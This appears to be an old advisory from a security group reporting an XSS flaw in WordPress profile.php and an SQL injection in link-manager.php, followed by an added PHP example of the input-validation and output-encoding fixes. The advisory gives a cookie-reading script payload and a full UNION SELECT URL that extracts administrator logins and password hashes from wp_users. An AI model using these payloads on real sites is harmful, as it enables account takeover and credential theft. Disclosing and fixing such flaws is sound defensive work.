XSS-Attack in wp-admin/profile.php & SQL bug in wp-admin/link-manager.php
==XSS==
Module: wp-admin/profile.php
Fields: Last Name, First Name.
You can enter some bad HTML code like <script>alert(document.cookie)</script>
in these fields.
Description and path:
http://adz.void.ru/?p=5
(C) ADZ Security Team
==SQL==
Module: wp-admin/link-manager.php
Example:
http://wordpress-site.org/wp-admin/link-manager.php?link_id=31337%20UNION%0SELECT%20ID%20as%20link_id,user_login%20AS%20link_url,user_pass%20AS%20link_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20wp_users%20WHERE%20user_level=10&action=linkedit
Description and path:
http://adz.void.ru/?p=6
(C) ADZ Security Team
==CONTACT==
http://adz.void.ru
kre0n@mail.ru
icq: 332757541
irc: #adz @ irc.uvao.net
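
The two fixes these reports call for, shown from the defender's side as an added example that is not part of the original post and is not WordPress code: link_id is accepted only as digits and bound as a query parameter, and the profile names are HTML-encoded on output. The function names, the `links` table and the sample rows are constructed for illustration; it assumes PHP 7.4+ with the pdo_sqlite extension.

```php
<?php
// Added example: plain PHP with PDO/SQLite, not WordPress code.
// Function names, the table layout and the sample rows are constructed.

// Accept link_id only if it is a short run of decimal digits.
function parse_link_id(string $raw): ?int
{
    if ($raw === '' || strlen($raw) > 9 || !ctype_digit($raw)) {
        return null;   // spaces, newlines, signs and keywords all fail here
    }
    return (int) $raw;
}

// Look the link up with a bound parameter, so the value is never SQL text.
function find_link(PDO $db, int $linkId): ?array
{
    $stmt = $db->prepare('SELECT link_url, link_name FROM links WHERE link_id = ?');
    $stmt->bindValue(1, $linkId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Encode profile names at the point they are written into HTML.
function render_name(string $first, string $last): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return $enc($first) . ' ' . $enc($last);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE links (link_id INTEGER PRIMARY KEY, link_url TEXT, link_name TEXT)');
$db->exec("INSERT INTO links VALUES (7, 'http://example.org/', 'Example')");

// Constructed inputs modelled on the two reports above.
$inputs = ['7', '31337 UNION SELECT ID AS link_id', "7\n", '-1'];
foreach ($inputs as $raw) {
    $id  = parse_link_id($raw);
    $row = $id === null ? null : find_link($db, $id);
    printf("%-36s => %s\n", json_encode($raw), $row ? $row['link_name'] : 'rejected or not found');
}
echo render_name('<script>alert(document.cookie)</script>', 'Doe'), "\n";
```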